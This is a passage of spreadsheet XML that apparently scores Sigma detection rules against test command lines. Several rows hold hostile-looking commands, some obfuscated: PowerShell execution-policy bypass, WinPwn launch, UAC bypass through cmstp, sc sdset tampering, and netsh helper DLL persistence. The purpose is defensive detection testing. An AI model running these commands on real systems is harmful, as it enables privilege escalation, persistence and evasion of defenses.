          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J239" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K239" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="240" ht="15.75" customHeight="1" s="42">
      <c r="A240" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B240" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C240" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D240" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E240" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F240" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G240" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H240" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I240" s="43" t="n"/>
      <c r="J240" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K240" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="241" ht="15.75" customHeight="1" s="42">
      <c r="A241" s="44" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B241" s="44" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C241" s="44" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D241" s="44" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E241" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F241" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G241" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H241" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I241" s="43" t="n"/>
      <c r="J241" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K241" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="242" ht="15.75" customHeight="1" s="42">
      <c r="A242" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B242" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C242" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D242" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E242" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F242" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G242" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H242" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I242" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J242" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K242" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="243" ht="15.75" customHeight="1" s="42">
      <c r="A243" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B243" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C243" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D243" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E243" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F243" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G243" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H243" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I243" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J243" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K243" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="244" ht="15.75" customHeight="1" s="42">
      <c r="A244" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B244" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C244" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D244" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E244" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F244" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G244" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H244" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I244" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J244" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K244" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="245" ht="15.75" customHeight="1" s="42">
      <c r="A245" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B245" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C245" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D245" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E245" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F245" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G245" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H245" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I245" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J245" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K245" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="246" ht="15.75" customHeight="1" s="42">
      <c r="A246" s="43" t="inlineStr">
        <is>
          <t>t1555</t>
        </is>
      </c>
      <c r="B246" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C246" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D246" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E246" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F246" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G246" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H246" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I246" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J246" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K246" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="247" ht="15.75" customHeight="1" s="42">
      <c r="A247" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B247" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C247" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D247" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E247" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c start "" "C:\Users\Public\WP.exe"</t>
        </is>
      </c>
      <c r="F247" s="43" t="b">
        <v>0</v>
      </c>
      <c r="G247" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H247" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I247" s="43" t="n"/>
      <c r="J247" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K247" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="248" ht="15.75" customHeight="1" s="42">
      <c r="A248" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B248" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C248" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D248" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E248" s="43" t="inlineStr">
        <is>
          <t>C:\Windows\System32\cmd.exe /c Start C:\Temp\WinPwn_Tool.exe -recon</t>
        </is>
      </c>
      <c r="F248" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G248" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H248" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I248" s="43" t="n"/>
      <c r="J248" s="43" t="n">
        <v>1</v>
      </c>
      <c r="K248" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="249" ht="15.75" customHeight="1" s="42">
      <c r="A249" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B249" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C249" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D249" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E249" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ep bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F249" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G249" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H249" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I249" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J249" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K249" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="250" ht="15.75" customHeight="1" s="42">
      <c r="A250" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B250" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C250" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D250" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E250" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -file C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F250" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G250" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H250" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I250" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J250" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K250" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="251" ht="15.75" customHeight="1" s="42">
      <c r="A251" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B251" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C251" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D251" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E251" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -fiLE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F251" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G251" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H251" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I251" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J251" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K251" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="252" ht="15.75" customHeight="1" s="42">
      <c r="A252" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B252" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C252" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D252" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E252" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -eP bypass -fiLe C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F252" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G252" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H252" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I252" s="43" t="inlineStr">
        <is>
          <t>Suspicious PowerShell Parameter Substring (36210e0d-5b19-485d-a087-c096088885f0); Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J252" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K252" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="253" ht="15.75" customHeight="1" s="42">
      <c r="A253" s="43" t="inlineStr">
        <is>
          <t>t1555.003</t>
        </is>
      </c>
      <c r="B253" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_winpwn</t>
        </is>
      </c>
      <c r="C253" s="43" t="inlineStr">
        <is>
          <t>HackTool - WinPwn Execution</t>
        </is>
      </c>
      <c r="D253" s="43" t="inlineStr">
        <is>
          <t>d557dc06-62e8-4468-a8e8-7984124908ce</t>
        </is>
      </c>
      <c r="E253" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -ExecutionPolicy bypass -FilE C:\temp\audit.ps1</t>
        </is>
      </c>
      <c r="F253" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G253" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H253" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I253" s="43" t="inlineStr">
        <is>
          <t>Change PowerShell Policies to an Insecure Level (87e3c4e8-a6a8-4ad9-bb4f-46e7ff99a180)</t>
        </is>
      </c>
      <c r="J253" s="43" t="n">
        <v>0</v>
      </c>
      <c r="K253" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="254" ht="15.75" customHeight="1" s="42">
      <c r="A254" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B254" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C254" s="43" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D254" s="43" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E254" s="43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F254" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G254" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H254" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I254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54" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K254" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="255" ht="15.75" customHeight="1" s="42">
      <c r="A255" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B255" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C255" s="43" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D255" s="43" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E255" s="4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255" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G255" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H255" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I255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55" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K255" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="256" ht="15.75" customHeight="1" s="42">
      <c r="A256" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B256" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_hide_sevices</t>
        </is>
      </c>
      <c r="C256" s="43" t="inlineStr">
        <is>
          <t>Service DACL Abuse To Hide Services Via Sc.EXE</t>
        </is>
      </c>
      <c r="D256" s="43" t="inlineStr">
        <is>
          <t>a537cfc3-4297-4789-92b5-345bfd845ad0</t>
        </is>
      </c>
      <c r="E256" s="43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256" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G256" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H256" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I256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56" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K256" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="257" ht="15.75" customHeight="1" s="42">
      <c r="A257" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B257" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C257" s="43" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D257" s="43" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E257" s="4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257" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G257" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H257" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I257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57" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K257" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="258" ht="15.75" customHeight="1" s="42">
      <c r="A258" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B258" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_sc_sdset_modification</t>
        </is>
      </c>
      <c r="C258" s="43" t="inlineStr">
        <is>
          <t>Service Security Descriptor Tampering Via Sc.EXE</t>
        </is>
      </c>
      <c r="D258" s="43" t="inlineStr">
        <is>
          <t>98c5aeef-32d5-492f-b174-64a691896d25</t>
        </is>
      </c>
      <c r="E258" s="43" t="inlineStr">
        <is>
          <t>sc.exe "sdset" scmanager D:(A;;KA;;;WD)</t>
        </is>
      </c>
      <c r="F258" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G258" s="43" t="b">
        <v>0</v>
      </c>
      <c r="H258" s="43" t="b">
        <v>0</v>
      </c>
      <c r="I258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258" s="43" t="n">
        <v>2</v>
      </c>
      <c r="K258" s="43" t="b">
        <v>0</v>
      </c>
    </row>
    <row r="259" ht="15.75" customHeight="1" s="42">
      <c r="A259" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B259" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_hktl_empire_powershell_uac_bypass</t>
        </is>
      </c>
      <c r="C259" s="43" t="inlineStr">
        <is>
          <t>HackTool - Empire PowerShell UAC Bypass</t>
        </is>
      </c>
      <c r="D259" s="43" t="inlineStr">
        <is>
          <t>3268b746-88d8-4cd3-bffc-30077d02c787</t>
        </is>
      </c>
      <c r="E259" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -NonI -w hidden -c "$x=$((gp HKCU:\Software\Microsoft\Windows\Update).Update)"</t>
        </is>
      </c>
      <c r="F259" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G259" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H259" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I259" s="43" t="n"/>
      <c r="J259" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K259" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="260" ht="15.75" customHeight="1" s="42">
      <c r="A260" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B260" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C260" s="43" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D260" s="43" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E260" s="43" t="inlineStr">
        <is>
          <t>cmstp.exe /s C:\AtomicRedTeam\atomics\T1218.003\src\T1218.003_uacbypass.inf /au</t>
        </is>
      </c>
      <c r="F260" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G260" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H260" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I260" s="43" t="n"/>
      <c r="J260" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K260" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="261" ht="15.75" customHeight="1" s="42">
      <c r="A261" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B261" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C261" s="43" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D261" s="43" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E261" s="43" t="inlineStr">
        <is>
          <t>cmstp.exe /s C:\AtomicRedTeam\atomics\T1218.003\src\T1218.003.inf</t>
        </is>
      </c>
      <c r="F261" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G261" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H261" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I261" s="43" t="n"/>
      <c r="J261" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K261" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="262" ht="15.75" customHeight="1" s="42">
      <c r="A262" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B262" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C262" s="43" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D262" s="43" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E262" s="43" t="inlineStr">
        <is>
          <t>copy cmstp.exe not_cmstp.exe &amp;&amp; not_cmstp.exe /S /AU C:\Users\Public\Downloads\payload.inf</t>
        </is>
      </c>
      <c r="F262" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G262" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H262" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I262" s="43" t="n"/>
      <c r="J262" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K262" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="263" ht="15.75" customHeight="1" s="42">
      <c r="A263" s="43" t="inlineStr">
        <is>
          <t>t1548.002</t>
        </is>
      </c>
      <c r="B263" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_uac_bypass_cmstp</t>
        </is>
      </c>
      <c r="C263" s="43" t="inlineStr">
        <is>
          <t>Bypass UAC via CMSTP</t>
        </is>
      </c>
      <c r="D263" s="43" t="inlineStr">
        <is>
          <t>e66779cc-383e-4224-a3a4-267eeb585c40</t>
        </is>
      </c>
      <c r="E263" s="43" t="inlineStr">
        <is>
          <t>cmstp.exe -s "C:\AtomicRedTeam\atomics\T1218.003\src\T1218.003_uacbypass.inf" -au</t>
        </is>
      </c>
      <c r="F263" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G263" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H263" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I263" s="43" t="n"/>
      <c r="J263" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K263" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="264" ht="15.75" customHeight="1" s="42">
      <c r="A264" s="43" t="inlineStr">
        <is>
          <t>t1546.007</t>
        </is>
      </c>
      <c r="B264" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_netsh_helper_dll_persistence</t>
        </is>
      </c>
      <c r="C264" s="43" t="inlineStr">
        <is>
          <t>Potential Persistence Via Netsh Helper DLL</t>
        </is>
      </c>
      <c r="D264" s="43" t="inlineStr">
        <is>
          <t>56321594-9087-49d9-bf10-524fe8479452</t>
        </is>
      </c>
      <c r="E264" s="43" t="inlineStr">
        <is>
          <t>netsh.exe "a""d""d" "h""e""l""p""e""r" evil.dll</t>
        </is>
      </c>
      <c r="F264" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G264" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H264" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I264" s="43" t="n"/>
      <c r="J264" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K264" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="265" ht="15.75" customHeight="1" s="42">
      <c r="A265" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B265" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_create_service</t>
        </is>
      </c>
      <c r="C265" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using PowerShell</t>
        </is>
      </c>
      <c r="D265" s="43" t="inlineStr">
        <is>
          <t>c02e96b7-c63a-4c47-bd83-4a9f74afcfb2</t>
        </is>
      </c>
      <c r="E265" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "New-Service -Name 'TestService' -bin 'cmd.exe' -StartupType Manual"</t>
        </is>
      </c>
      <c r="F265" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G265" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H265" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I265" s="43" t="n"/>
      <c r="J265" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K265" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="266" ht="15.75" customHeight="1" s="42">
      <c r="A266" s="43" t="inlineStr">
        <is>
          <t>t1543.003</t>
        </is>
      </c>
      <c r="B266" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_powershell_create_service</t>
        </is>
      </c>
      <c r="C266" s="43" t="inlineStr">
        <is>
          <t>New Service Creation Using PowerShell</t>
        </is>
      </c>
      <c r="D266" s="43" t="inlineStr">
        <is>
          <t>c02e96b7-c63a-4c47-bd83-4a9f74afcfb2</t>
        </is>
      </c>
      <c r="E266" s="43" t="inlineStr">
        <is>
          <t>powershell.exe -Command "N`ew-Service -Name 'TestService' -BinaryPathName 'cmd.exe' -StartupType Manual"</t>
        </is>
      </c>
      <c r="F266" s="43" t="b">
        <v>1</v>
      </c>
      <c r="G266" s="43" t="b">
        <v>1</v>
      </c>
      <c r="H266" s="43" t="b">
        <v>1</v>
      </c>
      <c r="I266" s="43" t="n"/>
      <c r="J266" s="43" t="n">
        <v>3</v>
      </c>
      <c r="K266" s="43" t="b">
        <v>1</v>
      </c>
    </row>
    <row r="267" ht="15.75" customHeight="1" s="42">
      <c r="A267" s="43" t="inlineStr">
        <is>
          <t>t1574.011</t>
        </is>
      </c>
      <c r="B267" s="43" t="inlineStr">
        <is>
          <t>proc_creation_win_registry_privilege_escalation_via_service_key</t>
        </is>
      </c>
